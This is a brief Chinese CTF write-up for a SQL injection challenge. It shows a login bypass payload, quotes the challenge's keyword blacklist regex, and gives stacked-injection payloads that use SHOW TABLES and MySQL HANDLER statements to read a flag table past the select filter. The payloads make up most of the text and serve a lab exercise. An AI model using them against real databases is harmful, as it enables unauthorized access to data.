万能钥匙穿了
1' or '1'='1'#
上select被过滤了
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
感觉很像强网杯的随便注(看了一下就是),然后就是堆叠注入了。
1';show tables;#
官方文档。使用OPEN打开表的会话,在CLOSE前不会关闭;使其在打开期间使用READ读取文件。
1'; HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE; #
Last updated 1 year ago